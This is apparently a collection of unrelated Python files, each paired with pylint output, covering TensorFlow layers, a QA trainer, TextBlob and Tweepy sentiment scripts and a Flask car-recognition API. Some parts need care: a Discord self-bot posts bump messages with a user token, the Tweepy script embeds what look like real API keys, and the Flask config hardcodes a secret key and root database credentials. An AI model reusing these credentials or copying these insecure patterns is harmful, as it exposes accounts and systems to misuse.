[len(args[0].get_shape().as_list())-1]) 60 if wd: 61 add_wd(wd) 62 63 return out 64 65 def softmax(logits, mask=None, scope=None): 66 with tf.name_scope(scope or "Softmax"): 67 if mask is not None: 68 logits = exp_mask(logits, mask) 69 flat_logits = flatten(logits, 1) 70 flat_out = tf.nn.softmax(flat_logits) 71 out = reconstruct(flat_out, logits, 1) 72 73 return out 74 75 76 def softsel(target, logits, mask=None, scope=None): 77 """ 78 79 :param target: [ ..., J, d] dtype=float 80 :param logits: [ ..., J], dtype=float 81 :param mask: [ ..., J], dtype=bool 82 :param scope: 83 :return: [..., d], dtype=float 84 """ 85 with tf.name_scope(scope or "Softsel"): 86 a = softmax(logits, mask = mask) 87 target_rank = len(target.get_shape().as_list()) 88 out = tf.reduce_sum(tf.expand_dims(a, -1) * target, target_rank - 2) 89 return out 90 91 def highway_layer(arg, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0): 92 with tf.variable_scope(scope or "highway_layer"): 93 d = arg.get_shape()[-1] 94 trans = linear([arg], d, bias, bias_start=bias_start, scope='trans', wd=wd, input_keep_prob=input_keep_prob) 95 trans = tf.nn.relu(trans) 96 gate = linear([arg], d, bias, bias_start=bias_start, scope='gate', wd=wd, input_keep_prob=input_keep_prob) 97 gate = tf.nn.sigmoid(gate) 98 out = gate * trans + (1 - gate) * arg 99 return out 100 101 102 def highway_network(arg, num_layers, bias, bias_start=0.0, scope=None, wd=0.0, input_keep_prob=1.0): 103 with tf.variable_scope(scope or "highway_network"): 104 prev = arg 105 cur = None 106 for layer_idx in range(num_layers): 107 cur = highway_layer(prev, bias, bias_start=bias_start, scope="layer_{}".format(layer_idx), wd=wd, 108 input_keep_prob=input_keep_prob) 109 prev = cur 110 return cur 111 112 def conv1d(in_, filter_size, height, padding, keep_prob=1.0, scope=None): 113 with tf.variable_scope(scope or "conv1d"): 114 num_channels = in_.get_shape()[-1] 115 filter_ = tf.get_variable("filter", shape=[1, height, num_channels, filter_size], dtype='float') 116 bias = tf.get_variable("bias", shape=[filter_size], dtype='float') 117 strides = [1, 1, 1, 1] 118 in_ = tf.nn.dropout(in_, keep_prob) 119 xxc = tf.nn.conv2d(in_, filter_, strides, padding) + bias # [N*M, JX, W/filter_stride, d] 120 out = tf.reduce_max(tf.nn.relu(xxc), 2) # [-1, JX, d] 121 return out 122 123 124 def multi_conv1d(in_, filter_sizes, heights, padding, keep_prob=1.0, scope=None): 125 with tf.variable_scope(scope or "multi_conv1d"): 126 assert len(filter_sizes) == len(heights) 127 outs = [] 128 for filter_size, height in zip(filter_sizes, heights): 129 if filter_size == 0: 130 continue 131 out = conv1d(in_, filter_size, height, padding, keep_prob=keep_prob, scope="conv1d_{}".format(height)) 132 outs.append(out) 133 concat_out = tf.concat(outs, axis=2) 134 return concat_out 135 136 137 if __name__ == '__main__': 138 a = tf.Variable(np.random.random(size=(2,2,4))) 139 b = tf.Variable(np.random.random(size=(2,3,4))) 140 c = tf.tile(tf.expand_dims(a, 2), [1, 1, 3, 1]) 141 test = flatten(c,1) 142 out = reconstruct(test, c, 1) 143 d = tf.tile(tf.expand_dims(b, 1), [1, 2, 1, 1]) 144 e = linear([c,d,c*d],1,bias = False,scope = "test",) 145 # f = softsel(d, e) 146 with tf.Session() as sess: 147 tf.global_variables_initializer().run() 148 print(sess.run(test)) 149 print(sess.run(tf.shape(out))) 150 exit() 151 print(sess.run(tf.shape(a))) 152 print(sess.run(a)) 153 print(sess.run(tf.shape(b))) 154 print(sess.run(b)) 155 print(sess.run(tf.shape(c))) 156 print(sess.run(c)) 157 print(sess.run(tf.shape(d))) 158 print(sess.run(d)) 159 print(sess.run(tf.shape(e))) 160 print(sess.run(e))
11 - refactor: too-many-arguments 11 - refactor: too-many-positional-arguments 11 - refactor: too-many-locals 56 - warning: redefined-outer-name 29 - refactor: no-else-raise 12 - warning: unused-argument 71 - warning: redefined-outer-name 86 - warning: redefined-outer-name 88 - warning: redefined-outer-name 91 - refactor: too-many-arguments 91 - refactor: too-many-positional-arguments 93 - warning: redefined-outer-name 98 - warning: redefined-outer-name 102 - refactor: too-many-arguments 102 - refactor: too-many-positional-arguments 112 - refactor: too-many-arguments 112 - refactor: too-many-positional-arguments 120 - warning: redefined-outer-name 124 - refactor: too-many-arguments 124 - refactor: too-many-positional-arguments 131 - warning: redefined-outer-name 151 - warning: unreachable 150 - refactor: consider-using-sys-exit
1 from tensorflow import flags 2 import tensorflow as tf 3 from config import Singleton 4 import data_helper 5 6 import datetime,os 7 8 import models 9 import numpy as np 10 import evaluation 11 12 import sys 13 import logging 14 15 import time 16 now = int(time.time()) 17 timeArray = time.localtime(now) 18 timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray) 19 log_filename = "log/" +time.strftime("%Y%m%d", timeArray) 20 21 program = os.path.basename('program') 22 logger = logging.getLogger(program) 23 if not os.path.exists(log_filename): 24 os.makedirs(log_filename) 25 logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',datefmt='%a, %d %b %Y %H:%M:%S',filename=log_filename+'/qa.log',filemode='w') 26 logging.root.setLevel(level=logging.INFO) 27 logger.info("running %s" % ' '.join(sys.argv)) 28 29 30 31 from data_helper import log_time_delta,getLogger 32 33 logger=getLogger() 34 35 36 37 38 args = Singleton().get_qcnn_flag() 39 40 args._parse_flags() 41 opts=dict() 42 logger.info("\nParameters:") 43 for attr, value in sorted(args.__flags.items()): 44 logger.info(("{}={}".format(attr.upper(), value))) 45 opts[attr]=value 46 47 48 train,test,dev = data_helper.load(args.data,filter = args.clean) 49 50 q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split())) 51 a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split())) 52 53 alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data ) 54 logger.info('the number of words :%d '%len(alphabet)) 55 56 if args.data=="quora" or args.data=="8008" : 57 print("cn embedding") 58 embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data ) 59 train_data_loader = data_helper.getBatch48008 60 else: 61 embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data ) 62 train_data_loader = data_helper.get_mini_batch 63 opts["embeddings"] =embedding 64 opts["vocab_size"]=len(alphabet) 65 opts["max_input_right"]=a_max_sent_length 66 opts["max_input_left"]=q_max_sent_length 67 opts["filter_sizes"]=list(map(int, args.filter_sizes.split(","))) 68 69 print("innitilize over") 70 71 72 73 74 #with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)): 75 with tf.Graph().as_default(): 76 # with tf.device("/cpu:0"): 77 session_conf = tf.ConfigProto() 78 session_conf.allow_soft_placement = args.allow_soft_placement 79 session_conf.log_device_placement = args.log_device_placement 80 session_conf.gpu_options.allow_growth = True 81 sess = tf.Session(config=session_conf) 82 model=models.setup(opts) 83 model.build_graph() 84 saver = tf.train.Saver() 85 86 # ckpt = tf.train.get_checkpoint_state("checkpoint") 87 # if ckpt and ckpt.model_checkpoint_path: 88 # # Restores from checkpoint 89 # saver.restore(sess, ckpt.model_checkpoint_path) 90 # if os.path.exists("model") : 91 # import shutil 92 # shutil.rmtree("model") 93 # builder = tf.saved_model.builder.SavedModelBuilder("./model") 94 # builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING]) 95 # builder.save(True) 96 # variable_averages = tf.train.ExponentialMovingAverage( model) 97 # variables_to_restore = variable_averages.variables_to_restore() 98 # saver = tf.train.Saver(variables_to_restore) 99 # for name in variables_to_restore: 100 # print(name) 101 102 sess.run(tf.global_variables_initializer()) 103 @log_time_delta 104 def predict(model,sess,batch,test): 105 scores = [] 106 for data in batch: 107 score = model.predict(sess,data) 108 scores.extend(score) 109 return np.array(scores[:len(test)]) 110 111 best_p1=0 112 113 114 115 116 for i in range(args.num_epoches): 117 118 for data in train_data_loader(train,alphabet,args.batch_size,model=model,sess=sess): 119 # for data in data_helper.getBatch48008(train,alphabet,args.batch_size): 120 _, summary, step, loss, accuracy,score12, score13, see = model.train(sess,data) 121 time_str = datetime.datetime.now().isoformat() 122 print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13))) 123 logger.info("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13))) 124 #<<<<<<< HEAD 125 # 126 # 127 # if i>0 and i % 5 ==0: 128 # test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size) 129 # 130 # predicted_test = predict(model,sess,test_datas,test) 131 # map_mrr_test = evaluation.evaluationBypandas(test,predicted_test) 132 # 133 # logger.info('map_mrr test' +str(map_mrr_test)) 134 # print('map_mrr test' +str(map_mrr_test)) 135 # 136 # test_datas = data_helper.get_mini_batch_test(dev,alphabet,args.batch_size) 137 # predicted_test = predict(model,sess,test_datas,dev) 138 # map_mrr_test = evaluation.evaluationBypandas(dev,predicted_test) 139 # 140 # logger.info('map_mrr dev' +str(map_mrr_test)) 141 # print('map_mrr dev' +str(map_mrr_test)) 142 # map,mrr,p1 = map_mrr_test 143 # if p1>best_p1: 144 # best_p1=p1 145 # filename= "checkpoint/"+args.data+"_"+str(p1)+".model" 146 # save_path = saver.save(sess, filename) 147 # # load_path = saver.restore(sess, model_path) 148 # 149 # import shutil 150 # shutil.rmtree("model") 151 # builder = tf.saved_model.builder.SavedModelBuilder("./model") 152 # builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING]) 153 # builder.save(True) 154 # 155 # 156 #======= 157 158 test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size) 159 160 predicted_test = predict(model,sess,test_datas,test) 161 map_mrr_test = evaluation.evaluationBypandas(test,predicted_test) 162 163 logger.info('map_mrr test' +str(map_mrr_test)) 164 print('epoch '+ str(i) + 'map_mrr test' +str(map_mrr_test)) 165
27 - warning: logging-not-lazy 40 - warning: protected-access 41 - refactor: use-dict-literal 43 - warning: protected-access 50 - warning: unnecessary-lambda 51 - warning: unnecessary-lambda 56 - refactor: consider-using-in 104 - warning: redefined-outer-name 104 - warning: redefined-outer-name 104 - warning: redefined-outer-name 106 - warning: redefined-outer-name 1 - warning: unused-import
1 # For this solution I'm using TextBlob, using it's integration with WordNet. 2 3 from textblob import TextBlob 4 from textblob import Word 5 from textblob.wordnet import VERB 6 import nltk 7 import os 8 import sys 9 import re 10 import json 11 12 results = { "results" : [] } 13 14 #Override NLTK data path to use the one I uploaded in the folder 15 dir_path = os.path.dirname(os.path.realpath(__file__)) 16 nltk_path = dir_path + os.path.sep + "nltk_data" 17 nltk.data.path= [nltk_path] 18 19 #Text to analyze 20 TEXT = """ 21 Take this paragraph of text and return an alphabetized list of ALL unique words. A unique word is any form of a word often communicated 22 with essentially the same meaning. For example, 23 fish and fishes could be defined as a unique word by using their stem fish. For each unique word found in this entire paragraph, 24 determine the how many times the word appears in total. 25 Also, provide an analysis of what sentence index position or positions the word is found. 26 The following words should not be included in your analysis or result set: "a", "the", "and", "of", "in", "be", "also" and "as". 27 Your final result MUST be displayed in a readable console output in the same format as the JSON sample object shown below. 28 """ 29 TEXT = TEXT.lower() 30 31 WORDS_NOT_TO_CONSIDER = ["a", "the", "and", "of", "in", "be", "also", "as"] 32 nlpText= TextBlob(TEXT) 33 34 def getSentenceIndexesForWord(word, sentences): 35 sentenceIndexes = [] 36 for index, sentence in enumerate(sentences): 37 count = sum(1 for _ in re.finditer(r'\b%s\b' % re.escape(word.lower()), sentence)) 38 if count > 0: 39 sentenceIndexes.append(index) 40 return sentenceIndexes 41 42 #1: Get all words, excluding repetitions and all the sentences in the text 43 nlpTextWords = sorted(set(nlpText.words)) 44 nlpTextSentences = nlpText.raw_sentences 45 46 #2 Get results 47 synonymsList = [] 48 allreadyReadWords = [] 49 for word in nlpTextWords: 50 if word not in WORDS_NOT_TO_CONSIDER and word not in allreadyReadWords: 51 timesInText = nlpText.word_counts[word] 52 53 #Get sentence indexes where the word can be found 54 sentenceIndexes = getSentenceIndexesForWord(word, nlpTextSentences) 55 56 #Check for synonyms 57 for word2 in nlpTextWords: 58 if word2 not in WORDS_NOT_TO_CONSIDER and ( word.lower() != word2.lower() and len(list(set(word.synsets) & set(word2.synsets))) > 0 ): 59 #If I find a synonym of the word I add it to the list of words allready read and add the times that synonym appeared in the text to the total 60 #count of the unique word and the corresponding sentence indexes 61 allreadyReadWords.append(word2) 62 timesInText = timesInText + nlpText.word_counts[word2] 63 sentenceIndexes += getSentenceIndexesForWord(word2,nlpTextSentences) 64 65 allreadyReadWords.append(word) 66 67 results["results"].append({"word" : word.lemmatize(), #I return the lemma of the word because TextBlob's stems seem to be wrong for certain words 68 "total-occurances": timesInText, 69 "sentence-indexes": sorted(set(sentenceIndexes))}) 70 71 print(json.dumps(results, indent=4)) 72 73 74
34 - warning: redefined-outer-name 35 - warning: redefined-outer-name 4 - warning: unused-import 5 - warning: unused-import 8 - warning: unused-import
1 import requests 2 import time 3 4 token = "TOKEN" 5 6 headers = { 7 'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7', 8 'Authorization' : token 9 } 10 11 id = input(f"[?] Salon ID: ") 12 print("") 13 14 while True: 15 requests.post( 16 f"https://discord.com/api/channels/{id}/messages", 17 headers = headers, 18 json = {"content" : "!d bump"} 19 ) 20 print("[+] Serveur Bumpé") 21 time.sleep(121 * 60)
11 - warning: redefined-builtin 11 - warning: f-string-without-interpolation 15 - warning: missing-timeout
1 # Madis Settings 2 MADIS_PATH='/Users/alexiatopalidou/Desktop/erg/madis/src' 3 4 # Webserver Settings 5 # IMPORTANT: The port must be available. 6 web_port = 9090 # must be integer (this is wrong:'9090')
Clean Code: No Issues Detected
1 # -*- coding: utf-8 -*- 2 import os 3 import Queue 4 import random 5 from functools import wraps 6 7 import arrow 8 from flask import g, request 9 from flask_restful import reqparse, Resource 10 from passlib.hash import sha256_crypt 11 from itsdangerous import TimedJSONWebSignatureSerializer as Serializer 12 13 from car_recg import app, db, api, auth, limiter, logger, access_logger 14 from models import Users, Scope 15 import helper 16 17 18 def verify_addr(f): 19 """IP地址白名单""" 20 @wraps(f) 21 def decorated_function(*args, **kwargs): 22 if not app.config['WHITE_LIST_OPEN'] or request.remote_addr == '127.0.0.1' or request.remote_addr in app.config['WHITE_LIST']: 23 pass 24 else: 25 return {'status': '403.6', 26 'message': u'禁止访问:客户端的 IP 地址被拒绝'}, 403 27 return f(*args, **kwargs) 28 return decorated_function 29 30 31 @auth.verify_password 32 def verify_password(username, password): 33 if username.lower() == 'admin': 34 user = Users.query.filter_by(username='admin').first() 35 else: 36 return False 37 if user: 38 return sha256_crypt.verify(password, user.password) 39 return False 40 41 42 def verify_token(f): 43 """token验证装饰器""" 44 @wraps(f) 45 def decorated_function(*args, **kwargs): 46 if not request.headers.get('Access-Token'): 47 return {'status': '401.6', 'message': 'missing token header'}, 401 48 token_result = verify_auth_token(request.headers['Access-Token'], 49 app.config['SECRET_KEY']) 50 if not token_result: 51 return {'status': '401.7', 'message': 'invalid token'}, 401 52 elif token_result == 'expired': 53 return {'status': '401.8', 'message': 'token expired'}, 401 54 g.uid = token_result['uid'] 55 g.scope = set(token_result['scope']) 56 57 return f(*args, **kwargs) 58 return decorated_function 59 60 61 def verify_scope(scope): 62 def scope(f): 63 """权限范围验证装饰器""" 64 @wraps(f) 65 def decorated_function(*args, **kwargs): 66 if 'all' in g.scope or scope in g.scope: 67 return f(*args, **kwargs) 68 else: 69 return {}, 405 70 return decorated_function 71 return scope 72 73 74 class Index(Resource): 75 76 def get(self): 77 return { 78 'user_url': '%suser{/user_id}' % (request.url_root), 79 'scope_url': '%suser/scope' % (request.url_root), 80 'token_url': '%stoken' % (request.url_root), 81 'recg_url': '%sv1/recg' % (request.url_root), 82 'uploadrecg_url': '%sv1/uploadrecg' % (request.url_root), 83 'state_url': '%sv1/state' % (request.url_root) 84 }, 200, {'Cache-Control': 'public, max-age=60, s-maxage=60'} 85 86 87 class RecgListApiV1(Resource): 88 89 def post(self): 90 parser = reqparse.RequestParser() 91 92 parser.add_argument('imgurl', type=unicode, required=True, 93 help='A jpg url is require', location='json') 94 parser.add_argument('coord', type=list, required=True, 95 help='A coordinates array is require', 96 location='json') 97 args = parser.parse_args() 98 99 # 回调用的消息队列 100 que = Queue.Queue() 101 102 if app.config['RECGQUE'].qsize() > app.config['MAXSIZE']: 103 return {'message': 'Server Is Busy'}, 449 104 105 imgname = '%32x' % random.getrandbits(128) 106 imgpath = os.path.join(app.config['IMG_PATH'], '%s.jpg' % imgname) 107 try: 108 helper.get_url_img(request.json['imgurl'], imgpath) 109 except Exception as e: 110 logger.error('Error url: %s' % request.json['imgurl']) 111 return {'message': 'URL Error'}, 400 112 113 app.config['RECGQUE'].put((10, request.json, que, imgpath)) 114 115 try: 116 recginfo = que.get(timeout=15) 117 118 os.remove(imgpath) 119 except Queue.Empty: 120 return {'message': 'Timeout'}, 408 121 except Exception as e: 122 logger.error(e) 123 else: 124 return { 125 'imgurl': request.json['imgurl'], 126 'coord': request.json['coord'], 127 'recginfo': recginfo 128 }, 201 129 130 131 class StateListApiV1(Resource): 132 133 def get(self): 134 return { 135 'threads': app.config['THREADS'], 136 'qsize': app.config['RECGQUE'].qsize() 137 } 138 139 140 class UploadRecgListApiV1(Resource): 141 142 def post(self): 143 # 文件夹路径 string 144 filepath = os.path.join(app.config['UPLOAD_PATH'], 145 arrow.now().format('YYYYMMDD')) 146 if not os.path.exists(filepath): 147 os.makedirs(filepath) 148 try: 149 # 上传文件命名 随机32位16进制字符 string 150 imgname = '%32x' % random.getrandbits(128) 151 # 文件绝对路径 string 152 imgpath = os.path.join(filepath, '%s.jpg' % imgname) 153 f = request.files['file'] 154 f.save(imgpath) 155 except Exception as e: 156 logger.error(e) 157 return {'message': 'File error'}, 400 158 159 # 回调用的消息队列 object 160 que = Queue.Queue() 161 # 识别参数字典 dict 162 r = {'coord': []} 163 app.config['RECGQUE'].put((9, r, que, imgpath)) 164 try: 165 recginfo = que.get(timeout=app.config['TIMEOUT']) 166 except Queue.Empty: 167 return {'message': 'Timeout'}, 408 168 except Exception as e: 169 logger.error(e) 170 else: 171 return {'coord': r['coord'], 'recginfo': recginfo}, 201 172 173 api.add_resource(Index, '/') 174 api.add_resource(RecgListApiV1, '/v1/recg') 175 api.add_resource(StateListApiV1, '/v1/state') 176 api.add_resource(UploadRecgListApiV1, '/v1/uploadrecg')
26 - warning: redundant-u-string-prefix 48 - error: undefined-variable 50 - refactor: no-else-return 62 - error: function-redefined 66 - refactor: no-else-return 74 - refactor: too-few-public-methods 92 - error: undefined-variable 109 - warning: broad-exception-caught 121 - warning: broad-exception-caught 89 - refactor: inconsistent-return-statements 97 - warning: unused-variable 109 - warning: unused-variable 87 - refactor: too-few-public-methods 131 - refactor: too-few-public-methods 155 - warning: broad-exception-caught 168 - warning: broad-exception-caught 142 - refactor: inconsistent-return-statements 140 - refactor: too-few-public-methods 11 - warning: unused-import 13 - warning: unused-import 13 - warning: unused-import 13 - warning: unused-import 14 - warning: unused-import
1 # -*- coding: utf-8 -*- 2 import Queue 3 4 5 class Config(object): 6 # 密码 string 7 SECRET_KEY = 'hellokitty' 8 # 服务器名称 string 9 HEADER_SERVER = 'SX-CarRecgServer' 10 # 加密次数 int 11 ROUNDS = 123456 12 # token生存周期,默认1小时 int 13 EXPIRES = 7200 14 # 数据库连接 string 15 SQLALCHEMY_DATABASE_URI = 'mysql://root:root@127.0.0.1/hbc_store' 16 # 数据库连接绑定 dict 17 SQLALCHEMY_BINDS = {} 18 # 用户权限范围 dict 19 SCOPE_USER = {} 20 # 白名单启用 bool 21 WHITE_LIST_OPEN = True 22 # 白名单列表 set 23 WHITE_LIST = set() 24 # 处理线程数 int 25 THREADS = 4 26 # 允许最大数队列为线程数16倍 int 27 MAXSIZE = THREADS * 16 28 # 图片下载文件夹 string 29 IMG_PATH = 'img' 30 # 图片截取文件夹 string 31 CROP_PATH = 'crop' 32 # 超时 int 33 TIMEOUT = 5 34 # 识别优先队列 object 35 RECGQUE = Queue.PriorityQueue() 36 # 退出标记 bool 37 IS_QUIT = False 38 # 用户字典 dict 39 USER = {} 40 # 上传文件保存路径 string 41 UPLOAD_PATH = 'upload' 42 43 44 class Develop(Config): 45 DEBUG = True 46 47 48 class Production(Config): 49 DEBUG = False 50 51 52 class Testing(Config): 53 TESTING = True
5 - refactor: useless-object-inheritance 5 - refactor: too-few-public-methods 44 - refactor: too-few-public-methods 48 - refactor: too-few-public-methods 52 - refactor: too-few-public-methods
1 from car_recg import app 2 from car_recg.recg_ser import RecgServer 3 from ini_conf import MyIni 4 5 if __name__ == '__main__': 6 rs = RecgServer() 7 rs.main() 8 my_ini = MyIni() 9 sys_ini = my_ini.get_sys_conf() 10 app.config['THREADS'] = sys_ini['threads'] 11 app.config['MAXSIZE'] = sys_ini['threads'] * 16 12 app.run(host='0.0.0.0', port=sys_ini['port'], threaded=True) 13 del rs 14 del my_ini
Clean Code: No Issues Detected
1 ''' 2 Input- zoho123 3 Output- ohoz123 4 5 ''' 6 char= input("Enter the string: ") 7 char2= list(char) 8 num= "1234567890" 9 list1= [0]*len(char) 10 list2=[] 11 for i in range(len(char)): 12 if char2[i] not in num: 13 list2.append( char2.index( char2[i])) 14 char2[i]= "*" 15 list2.reverse() 16 k=0 17 for j in range( len(char) ): 18 if j in list2: 19 list1[j]= char[list2[k]] 20 k= k+1 21 else: 22 list1[j]= char[j] 23 ch="" 24 for l in range(len(list1)): 25 ch= ch+ list1[l] 26 print(ch)
Clean Code: No Issues Detected
1 import os 2 import sys 3 import argparse 4 from PIL import Image # From Pillow (pip install Pillow) 5 6 def resize_photos(dir, new_x, new_y, scale): 7 if(not os.path.exists(dir)): 8 # if not in full path format (/usrers/user/....) 9 # check if path is in local format (folder is in current working directory) 10 if(not os.path.exists(os.path.join(os.getcwd(), dir))): 11 print(dir + " does not exist.") 12 exit() 13 else: 14 # path is not a full path, but folder exists in current working directory 15 # convert path to full path 16 dir = os.path.join(os.getcwd(), dir) 17 18 i = 1 # image counter for print statements 19 for f in os.listdir(dir): 20 if(not f.startswith('.') and '.' in f): 21 # accepted image types. add more types if you need to support them! 22 accepted_types = ["jpg", "png", "bmp"] 23 if(f[-3:].lower() in accepted_types): 24 # checks last 3 letters of file name to check file type (png, jpg, bmp...) 25 # TODO: need to handle filetypes of more than 3 letters (for example, jpeg) 26 path = os.path.join(dir, f) 27 img = Image.open(path) 28 29 if(scale > 0): 30 w, h = img.size 31 newIm = img.resize((w*scale, h*scale)) 32 else: 33 newIm = img.resize((new_x, new_y)) 34 35 newIm.save(path) 36 print("Image #" + str(i) + " finsihed resizing: " + path) 37 i=i+1 38 else: 39 print(f + " of type: " + f[-3:].lower() + " is not an accepted file type. Skipping.") 40 print("ALL DONE :) Resized: " + str(i) + " photos") 41 42 if __name__ == "__main__": 43 parser = argparse.ArgumentParser() 44 parser.add_argument("-d", "-directory", help="(String) Specify the folder path of images to resize") 45 parser.add_argument("-s", "-size", help="(Integer) New pixel value of both width and height. To specify width and height seperately, use -x and -y.") 46 parser.add_argument("-x", "-width", help="(Integer) New pixel value of width") 47 parser.add_argument("-y", "-height", help="(Integer) New pixel value of height") 48 parser.add_argument("-t", "-scale", help="(Integer) Scales pixel sizes.") 49 50 args = parser.parse_args() 51 52 if(not args.d or ((not args.s) and (not args.x and not args.y) and (not args.t))): 53 print("You have error(s)...\n") 54 if(not args.d): 55 print("+ DIRECTORY value missing Please provide a path to the folder of images using the argument '-d'\n") 56 if((not args.s) and (not args.x or not args.y) and (not args.t)): 57 print("+ SIZE value(s) missing! Please provide a new pixel size. Do this by specifying -s (width and height) OR -x (width) and -y (height) values OR -t (scale) value") 58 exit() 59 60 x = 0 61 y = 0 62 scale = 0 63 if(args.s): 64 x = int(args.s) 65 y = int(args.s) 66 elif(args.x and args.y): 67 x = int(args.x) 68 y = int(args.y) 69 elif(args.t): 70 scale = int(args.t) 71 72 print("Resizing all photos in: " + args.d + " to size: " + str(x)+"px,"+str(y)+"px") 73 resize_photos(args.d, x, y, scale)
25 - warning: fixme 6 - warning: redefined-builtin 6 - warning: redefined-outer-name 12 - refactor: consider-using-sys-exit 58 - refactor: consider-using-sys-exit 2 - warning: unused-import
1 import tweepy 2 import csv 3 import pandas as pd 4 from textblob import TextBlob 5 import matplotlib.pyplot as plt 6 7 ####input your credentials here 8 consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh' 9 consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9' 10 access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg' 11 access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4' 12 13 auth = tweepy.OAuthHandler(consumer_key, consumer_secret) 14 auth.set_access_token(access_token, access_token_secret) 15 api = tweepy.API(auth,wait_on_rate_limit=True) 16 17 # Open/Create a file to append data 18 csvFile = open('tweets.csv', 'w+') 19 # Use csv Writer 20 csvWriter = csv.writer(csvFile) 21 tag = "#DonaldTrump" 22 limit = 0 23 res = "" 24 positive = 0 25 negative = 0 26 neutral = 0 27 csvWriter.writerow(["ID", "Username", "Twitter @", "Tweet","Tweeted At", "Favourite Count", "Retweet Count", "Sentiment"]) 28 csvWriter.writerow([]) 29 30 for tweet in tweepy.Cursor(api.search,q=""+tag,count=350,lang="en",tweet_mode = "extended").items(): 31 # print (tweet.created_at, tweet.text) 32 temp = tweet.full_text 33 if temp.startswith('RT @'): 34 continue 35 blob = TextBlob(tweet.full_text) 36 if blob.sentiment.polarity > 0: 37 res = "Positive" 38 positive = positive+1 39 elif blob.sentiment.polarity == 0: 40 res = "Neutral" 41 neutral = neutral+1 42 else: 43 res = "Negative" 44 negative = negative+1 45 46 47 print ("ID:", tweet.id) 48 print ("User ID:", tweet.user.id) 49 print ("Name: ", tweet.user.name) 50 print ("Twitter @:", tweet.user.screen_name) 51 print ("Text:", tweet.full_text) 52 print ("Tweet length:", len(tweet.full_text)) 53 print ("Created:(UTC)", tweet.created_at) 54 print ("Favorite Count:", tweet.favorite_count) 55 print ("Retweet count:", tweet.retweet_count) 56 print ("Sentiment:", res) 57 # print ("Retweeted? :", tweet.retweeted) 58 # print ("Truncated:", tweet.truncated) 59 print ("\n\n") 60 61 csvWriter.writerow([tweet.id, tweet.user.name, tweet.user.screen_name, tweet.full_text,tweet.created_at, tweet.favorite_count, tweet.retweet_count, res]) 62 csvWriter.writerow([]) 63 limit = limit + 1 64 if limit == 25: 65 break 66 67 print ("Done") 68 69 print ("\n\n\n") 70 total = positive+negative+neutral 71 positivePercent = 100*(positive/total) 72 negativePercent = 100*(negative/total) 73 neutralPercent = 100*(neutral/total) 74 75 print ("Positive tweets: {} %".format(positivePercent)) 76 print ("Negative tweets: {} %".format(negativePercent)) 77 print ("Neutral tweets: {} %".format(neutralPercent)) 78 79 80 81 # infile = 'tweets.csv' 82 83 # with open(infile, 'r') as csvfile: 84 # rows = csv.reader(csvfile) 85 # for row in rows: 86 # sentence = row[3] 87 # blob = TextBlob(sentence) 88 # print (blob.sentiment) 89 90 91 labels = 'Neutral', 'Positive', 'Negative' 92 sizes = [] 93 sizes.append(neutralPercent) 94 sizes.append(positivePercent) 95 sizes.append(negativePercent) 96 colors = ['lightskyblue','yellowgreen', 'lightcoral'] 97 explode = (0.0, 0, 0) # explode 1st slice 98 99 # Plot 100 plt.pie(sizes, explode=explode, labels=labels, colors=colors, 101 autopct='%1.1f%%', shadow=False, startangle=140) 102 plt.suptitle("Sentiment Analysis of {} tweets related to {}".format(limit, tag)) 103 plt.axis('equal') 104 plt.show() 105
34 - warning: bad-indentation 65 - warning: bad-indentation 18 - warning: unspecified-encoding 18 - refactor: consider-using-with 3 - warning: unused-import
1 from flask import Flask, render_template, request 2 from test import mining 3 app = Flask(__name__) 4 5 @app.route('/') 6 def index(): 7 return render_template('hello.html') 8 9 10 @app.route('/', methods=['GET', 'POST']) 11 def submit(): 12 if request.method == 'POST': 13 print (request.form) # debug line, see data printed below 14 tag = request.form['tag'] 15 limit = request.form['limit'] 16 # msg = tag+" "+limit 17 sen_list = mining(tag,limit) 18 msg = "Positive Percent = "+sen_list[0]+"% <br>Negative Percent = "+sen_list[1]+"% <br>Neutral Percent = "+sen_list[2]+"%" 19 return ""+msg 20 21 if __name__ == '__main__': 22 app.run(debug = True) 23 24 print("This")
7 - warning: bad-indentation 12 - warning: bad-indentation 13 - warning: bad-indentation 14 - warning: bad-indentation 15 - warning: bad-indentation 17 - warning: bad-indentation 18 - warning: bad-indentation 19 - warning: bad-indentation 22 - warning: bad-indentation 2 - error: no-name-in-module 19 - error: possibly-used-before-assignment
1 import csv 2 csvFile = open('res.csv', 'w+')
2 - warning: unspecified-encoding 2 - refactor: consider-using-with 1 - warning: unused-import
1 #!/usr/bin/env python 2 3 print ("some output") 4 return "hello"
4 - error: return-outside-function
1 import matplotlib.pyplot as plt 2 3 # Data to plot 4 labels = 'Neutral', 'Positive', 'Negative' 5 sizes = [20, 40, 40] 6 colors = ['lightskyblue','yellowgreen', 'lightcoral'] 7 explode = (0.0, 0, 0) # explode 1st slice 8 9 # Plot 10 plt.pie(sizes, explode=explode, labels=labels, colors=colors, 11 autopct='%1.1f%%', shadow=True, startangle=140) 12 13 plt.axis('equal') 14 # plt.title('Sentiment analysis') 15 plt.suptitle('Analysing n tweets related to #') 16 plt.show()
Clean Code: No Issues Detected
